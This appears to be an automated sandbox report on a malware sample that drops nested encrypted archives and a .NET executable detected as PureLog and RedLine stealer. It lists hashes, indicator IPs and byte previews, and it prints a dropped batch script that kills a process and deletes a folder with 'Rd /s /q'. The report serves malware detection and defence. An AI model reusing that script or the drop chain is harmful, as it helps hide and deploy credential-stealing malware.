                        PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                        • 192.227.225.166
                        PRZELEW BANKOWY.xlsGet hashmaliciousUnknownBrowse
                        • 192.227.225.166
                        DHL Shipment Notification 490104998009.xlsGet hashmaliciousRemcosBrowse
                        • 192.3.101.142
                        No context
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        C:\Users\user\AppData\Local\Temp\main\7z.dllLisectAVT_2403002A_166.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                          LisectAVT_2403002A_166.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                            installer.exeGet hashmaliciousLummaC, PureLog Stealer, Xmrig, zgRATBrowse
                              conhost.exeGet hashmaliciousXmrigBrowse
                                Software1.30.1.exeGet hashmaliciousRedLine, XmrigBrowse
                                  u841TF5Qex.exeGet hashmaliciousDCRatBrowse
                                    Laun3cher_E@zy.exeGet hashmaliciousLummaC, Apollo, LummaC Stealer, XmrigBrowse
                                      8oPNV681Qw.exeGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                        hZE4solQRQ.exeGet hashmaliciousDCRatBrowse
                                          d5raNaLQ8Q.exeGet hashmaliciousXmrigBrowse
                                            Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:52 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                            Category:dropped
                                            Size (bytes):2104
                                            Entropy (8bit):3.45122343775873
                                            Encrypted:false
                                            SSDEEP:48:8S+l2dfTXd3RYrnvPdAKRkdAGdAKRFdAKRE:8S+lOw
                                            MD5:9B06439B83E535E5E3CE4AF78E54A69B
                                            SHA1:06BD847740A637836F667894EBA8FFE2A7F0C227
                                            SHA-256:6CBC2DAA6A8AE26AC037CB636CF45A7AEF2A7B1E64E18D774C5A294CACD3632F
                                            SHA-512:9EADB3D584D153842C45FE9EEBE0DB479D4C0367049E7B1FA0231C7979B38F3E8D0505B46FCD8D9238AE751905056390CF84253717F131F924C1085DF31471D1
                                            Malicious:false
                                            Reputation:low
                                            Preview:L..................F.@.. ......,.....0l.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.!.-.-.p.r.o.x.y.-.s.e.r.v.e.r
                                            Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):3274
                                            Entropy (8bit):5.3318368586986695
                                            Encrypted:false
                                            SSDEEP:96:iqlYqh3oIqxwCtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:iqlYqh3LqxwCtI6eqzxP0at9KTqdqlqY
                                            MD5:DB935B492A78CA89E32C1468CD0BC3C2
                                            SHA1:35C71D134C6B3DFB133CED4FB9522458DA6F3CB3
                                            SHA-256:8E165F9C5DD16147DAA8BA77E1B711AF5C196707D19B38C98841DD3D8F679C7E
                                            SHA-512:5454886BEF6CCF6A5795BA281940A7CDE8B332A44FF68F1167C2A7429764D01BF43028955292D0072949B270EAEE625C7A7158FAAB9C6B92A569F0597DCA0DD7
                                            Malicious:false
                                            Reputation:low
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                            Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2662
                                            Entropy (8bit):7.8230547059446645
                                            Encrypted:false
                                            SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                            MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                            SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                            SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                            SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                            Process:C:\Users\user\AppData\Local\Temp\main\in.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):2662
                                            Entropy (8bit):7.8230547059446645
                                            Encrypted:false
                                            SSDEEP:48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
                                            MD5:1420D30F964EAC2C85B2CCFE968EEBCE
                                            SHA1:BDF9A6876578A3E38079C4F8CF5D6C79687AD750
                                            SHA-256:F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
                                            SHA-512:6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
                                            Malicious:false
                                            Preview:0..b...0.."..*.H..............0...0.....*.H..............0...0.....*.H............0...0...*.H.......0...p.,|.(.............mW.....$|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%..*.X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...|B.d..kr.=G.g.v..f.d.C.?..*.0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.
                                            Process:C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):1679360
                                            Entropy (8bit):6.278252955513617
                                            Encrypted:false
                                            SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                            MD5:72491C7B87A7C2DD350B727444F13BB4
                                            SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                            SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                            SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Joe Sandbox View:
                                            • Filename: LisectAVT_2403002A_166.exe, Detection: malicious, Browse
                                            • Filename: LisectAVT_2403002A_166.exe, Detection: malicious, Browse
                                            • Filename: installer.exe, Detection: malicious, Browse
                                            • Filename: conhost.exe, Detection: malicious, Browse
                                            • Filename: Software1.30.1.exe, Detection: malicious, Browse
                                            • Filename: u841TF5Qex.exe, Detection: malicious, Browse
                                            • Filename: Laun3cher_E@zy.exe, Detection: malicious, Browse
                                            • Filename: 8oPNV681Qw.exe, Detection: malicious, Browse
                                            • Filename: hZE4solQRQ.exe, Detection: malicious, Browse
                                            • Filename: d5raNaLQ8Q.exe, Detection: malicious, Browse
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                            Category:dropped
                                            Size (bytes):468992
                                            Entropy (8bit):6.157743912672224
                                            Encrypted:false
                                            SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                            MD5:619F7135621B50FD1900FF24AADE1524
                                            SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                            SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                            SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 0%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                            Process:C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):222
                                            Entropy (8bit):4.855194602218789
                                            Encrypted:false
                                            SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                            MD5:68CECDF24AA2FD011ECE466F00EF8450
                                            SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                            SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                            SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                            Malicious:false
                                            Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                            Category:dropped
                                            Size (bytes):2335339
                                            Entropy (8bit):5.897999492198445
                                            Encrypted:false
                                            SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xE:R9kqGu7okoZscCnf0/Zs9D
                                            MD5:916E2689C5B5A98A0539A068C8E48088
                                            SHA1:8A4D9C0C0F4E0A2375D916B60D7DE7047C42B2E9
                                            SHA-256:9A591139A095B056070DE3B557325FD82783712252F394DAC912485881DB304E
                                            SHA-512:56436800823435210995352296C0263871CD7F750D28C394B8588978057455114FB7CC619A237C2C5699D83A0C861011AD2B938182F4ECB038BC4112A0C9D173
                                            Malicious:false
                                            Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                            Category:dropped
                                            Size (bytes):609442
                                            Entropy (8bit):7.999002323328906
                                            Encrypted:true
                                            SSDEEP:12288:Bn4iXhJ6TPX2bBlP2nTgxJDpK6MLjvETZUUZDSV1MfXdSbgMyQfPVQOTtl8OCJ:VxJ6L2bnP2ncxJDpijgRDSvMf9MyCQOC
                                            MD5:E8B7D80AB2F79EFE1BD3D1A81C06BF6D
                                            SHA1:40741AD3E338CE10A13CD98E91A54A09CB22A8FD
                                            SHA-256:94BC8E86EE39E4E5409083A5E69E47B99780FEF994858BAF0345AD88B071E9F8
                                            SHA-512:9BAFEB3B70526AF629BC1B042C8D3E4EB77281D04C2DF703E3C3F4644F3D6D7DF3F5FA51C9D2F67206EB3A083575310C134DA87764E7FA49EB3DE3E91BA78D8F
                                            Malicious:false
                                            Preview:PK...........X.....L..........in.exe.].x.E...kI..$^P.....D.!bD....!..$ ..`..(.bAE.C.."v)...+*.OQ.;.+...w;ws3w..M...3....7o.);.ff9..,....6mbl1s..3._. ..|.@.+...W..w...{L..!..F....5...XeW..e..e.8.X{.......(d.....`.g<2%!.#...]...1...i...X3.qp.z.4.|...G......'=....9r_x.....g......I..#|hJ.sm..x..V...j..8.suM. ...).Kxn.j.k,.\]5b4..1...7.u..u5W.]..FIB.......`...0...b/].f.....Zv....-l..z.R..AF=.@B.....{.....*.F.S=L|"....O.M.6..".........c.h.....<{m.4....OM.h1....9.-....j..S....J.s.....#.n...fI..&......p..Eu..........v..$[...@.O+<.#.8.P......E(s+..h.t]..|.J.C<R...s..8V..xV.(<....J9.....2.J..%/.......i"u..z.....%.-.}..%xr.g.K..o.....6..].|.O.d[3.......*....o[.......~...J............3..........r.t.p.... ..lV...W.....T...A....4..6.p8....!..w...}0`1GMp.(O...[..Q.ATv......X.Q..........,.l......}..e..b`W4@.<....5.=.].M. {2..do.`s...v_Z.u......Q...p............+2:.;z.......j...6.3..Ge..\....O....#._/..}....g..Z%R}.=.q.....m../.iL...."..'K.'.....wx.
                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                            Category:dropped
                                            Size (bytes):609596
                                            Entropy (8bit):7.999010327422088
                                            Encrypted:true
                                            SSDEEP:12288:3n4iXhJ6TPX2bBlP2nTgxJDpK6MLjvETZUUZDSV1MfXdSbgMyQfPVQOTtl8OCd:vxJ6L2bnP2ncxJDpijgRDSvMf9MyCQO6
                                            MD5:F59C5F88B141450FCA78896B7EDFB95F
                                            SHA1:9EEC844527E9420417CC227ED9D95D9522C71FA2
                                            SHA-256:434D4132E27F2740C59E78C615703C1D55850123F76F1684A5BBBE1CFDE1CFF8
                                            SHA-512:C49A67CB05B90F26C4B03E586074A720E8A2152364422D31E3A4E94342A7D060459FDCA2D1342E9B9D468A7976E3D83ADD089F6B99814B0E1AA8B5EC4474EA3F
                                            Malicious:false
                                            Preview:PK...........X...B.L...L......file_1.zipPK...........X.....L..........in.exe.].x.E...kI..$^P.....D.!bD....!..$ ..`..(.bAE.C.."v)...+*.OQ.;.+...w;ws3w..M...3....7o.);.ff9..,....6mbl1s..3._. ..|.@.+...W..w...{L..!..F....5...XeW..e..e.8.X{.......(d.....`.g<2%!.#...]...1...i...X3.qp.z.4.|...G......'=....9r_x.....g......I..#|hJ.sm..x..V...j..8.suM. ...).Kxn.j.k,.\]5b4..1...7.u..u5W.]..FIB.......`...0...b/].f.....Zv....-l..z.R..AF=.@B.....{.....*.F.S=L|"....O.M.6..".........c.h.....<{m.4....OM.h1....9.-....j..S....J.s.....#.n...fI..&......p..Eu..........v..$[...@.O+<.#.8.P......E(s+..h.t]..|.J.C<R...s..8V..xV.(<....J9.....2.J..%/.......i"u..z.....%.-.}..%xr.g.K..o.....6..].|.O.d[3.......*....o[.......~...J............3..........r.t.p.... ..lV...W.....T...A....4..6.p8....!..w...}0`1GMp.(O...[..Q.ATv......X.Q..........,.l......}..e..b`W4@.<....5.=.].M. {2..do.`s...v_Z.u......Q...p............+2:.;z.......j...6.3..Ge..\....O....#._/..}....g..Z%
                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                            Category:dropped
                                            Size (bytes):609720
                                            Entropy (8bit):7.999444761789847
                                            Encrypted:true
                                            SSDEEP:12288:WxZUs/PTmZBlFs1T8dVLpEO+L5paJZ6UzrSD1MRXdS58MO8fPNQEp9p8gkcp:ZszmZnFs1QdVLp450prSBMRLMOcQE6gf
                                            MD5:E150123E0B94B1BBE4C37658A6609FFD
                                            SHA1:B8EF74C6EBBC98126127E6269007DFEC2012717E
                                            SHA-256:ED83E61A381B166E258CA4CB89F5B4539E7461ABEDB15632F7434CC300F1301A
                                            SHA-512:C884CA654A0CEF6CE611CF9F770424B9D1654B663CFEA4083A73329E5EF86EE2A78755BC65DC3F1AF1C81FEEAC82FC2062053AF579756157B1961F6DD1975F8D
                                            Malicious:false
                                            Preview:PK...........X..u..M..<M......file_2.zip.&,..PK...........X...B.L...L......file_1.zipPK...........X.....L..........in.exe.].x.E...kI..$^P.....D.!bD....!..$ ..`..(.bAE.C.."v)...+*.OQ.;.+...w;ws3w..M...3....7o.);.ff9..,....6mbl1s..3._. ..|.@.+...W..w...{L..!..F....5...XeW..e..e.8.X{.......(d.....`.g<2%!.#...]...1...i...X3.qp.z.4.|...G......'=....9r_x.....g......I..#|hJ.sm..x..V...j..8.suM. ...).Kxn.j.k,.\]5b4..1...7.u..u5W.]..FIB.......`...0...b/].f.....Zv....-l..z.R..AF=.@B.....{.....*.F.S=L|"....O.M.6..".........c.h.....<{m.4....OM.h1....9.-....j..S....J.s.....#.n...fI..&......p..Eu..........v..$[...@.O+<.#.8.P......E(s+..h.t]..|.J.C<R...s..8V..xV.(<....J9.....2.J..%/.......i"u..z.....%.-.}..%xr.g.K..o.....6..].|.O.d[3.......*....o[.......~...J............3..........r.t.p.... ..lV...W.....T...A....4..6.p8....!..w...}0`1GMp.(O...[..Q.ATv......X.Q..........,.l......}..e..b`W4@.<....5.=.].M. {2..do.`s...v_Z.u......Q...p............+2:.;z....
                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                            Category:dropped
                                            Size (bytes):2273813
                                            Entropy (8bit):7.998455557939854
                                            Encrypted:true
                                            SSDEEP:49152:4ujCK3D0AC/l5mwbBkDWYb1ZN4UJ9o/Zszm1FUELpZW/v6D:4aR3D0Ae5mwdkDWm1Xoym7e/O
                                            MD5:1EBECBD9E101E1E4830705FB45D8543F
                                            SHA1:8038EE888C6F3E5D5E1BEE482361BD5975D05B4A
                                            SHA-256:7F9C40F91877AF8611D9045E9C4262C3F67E4313C09BCB1787D1F629D6C26657
                                            SHA-512:B1DADB963FB4A0F4FA818A5907703D968EA2C9A4E58DD7058DC5B4936E4B032624C2C8039E40FA39D2E7847D11D05EFCDCE801097DEB69A64DDD96AC549F1612
                                            Malicious:false
                                            Preview:PK...........X..x.=c..k.#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):912896
                                            Entropy (8bit):6.91142180340863
                                            Encrypted:false
                                            SSDEEP:24576:nMids7o3onI9JrpEjMzDSNMfhM0eQsqas:n7KoIyrpdsPBqa
                                            MD5:E8937B534F6C730C0A82793CCDDC0692
                                            SHA1:564BE62115F50DFA5D577C484C53B49A9F23D00D
                                            SHA-256:2904D8F82287362442C4485412330439EBEDE37D0834E8A54BB9DB188A8123D4
                                            SHA-512:C16578A9BA12994178AB5A3D42B7A827E0D4464E533C951D269F161F11C9033B87CD8754FA81EB07FA43E21233E03458FEE67970B59FBEB21F07B93B1FFCCBD9
                                            Malicious:true
                                            Yara Hits:
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, Author: Joe Security
                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, Author: Joe Security
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.. ...........>... ...@....@.. .......................@............@..................................>..K....@....................... ....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@....reloc....... ......................@..B.................>......H.......,...H...........tV......>.......................................0.......... ........8........E........i...u.......)...=...8....8j... ....~....{....:....& ....8....~....:A... ....8....(.... .... .... ....s....(........ ....8z...r...ps....z*....(....(.... ....<.... ....~....{....:B...& ....87......... ....8'.....0..........(.... ........8........E........N...*.......8....*(.... ....~....{o...9....& ....8....(.... ....~....{f...9....& ....8....(.... ....~....{....:....&
                                            Process:C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exe
                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                            Category:dropped
                                            Size (bytes):2273979
                                            Entropy (8bit):7.999914742624508
                                            Encrypted:true
                                            SSDEEP:49152:kiDOyrn4cq0kao0r7D3ncd7gyP1KhxljzQA8H2ZBIdqit:SV0no0S/PAVZ+3t
                                            MD5:EA47839FFE04168028932250CCE39DA3
                                            SHA1:5F137402C577C82CA93FFEB8381141E6ABC42D5A
                                            SHA-256:21B777B5BCF3B3C0D1569802F2D68A9B27C91C5EEFA60C3814A0DFB0452D2E75
                                            SHA-512:3D3C8085BC8990D9DB4CE48216ED0CEC9969A19B87EB1603FA62FADF17A1F6F898F8872AFF3ACCE4A5C2290C63D4DB2F03F25314EFD901A6BDDC59CBE474B0FB
                                            Malicious:false
                                            Preview:PK...........Xv2..!."...".....file_4.zip.(`..xs....h...=pS..9..[B.....3..`2w.......-9.mH...DK.{..E.?.-.kJ.] -..zX6.....j.$......%0d...M.f.R...U.'z.@.\......5.....jW...U......jZ.*........ ...WA....0:ip-/s.4..w...;.......M...gD.c*..].[h=..d~4*wR.]d.....%.G"].CR..........$.Z.w.......:.......h..TI1.U..?....f7\.~...c_g.UM...I@|....[#$.Hl...?z...c...j...t.....?.1/...$..(.B:......F..V....].l.>......k..h.....U.X.V...Z..`.b..H9.ub..c..i...(zEsnR~*+..>..VbxK..m...T.B...t...=B.....................|..K. ..J..m}........,g....m.$O~/.^..j..0..k'!fu.P.0.9.x.v.s...%...SW.q.0u.j;...T..%.W.b.?...[^.?...f.W_!SZ...T...B...9SJ.3M..:*.q.E9...[.$og....V.Um0....=tu...Mn^.xR&...>..t.;JRv..5e.~. }.v...<. ...G.*..^....u.~[..?.J...Ok..!l.J....V.K..6.%t"N.......O..wl$..jn8,..B.p....y.W.31.Z5.\...;..]_H......R....2)...(.j.....+..k.r../oiuf...].;\l............!K.....\[p....L..2x...w...H.FDH9.5gE.d.6kL..R...i..xq..?.\...td)B~.<{{..H.Gk'.._..i...u0....b.I.#{2..9y..w....:..F
                                            Process:C:\Windows\System32\cmd.exe
                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                            Category:dropped
                                            Size (bytes):2273979
                                            Entropy (8bit):7.999914742624508
                                            Encrypted:true
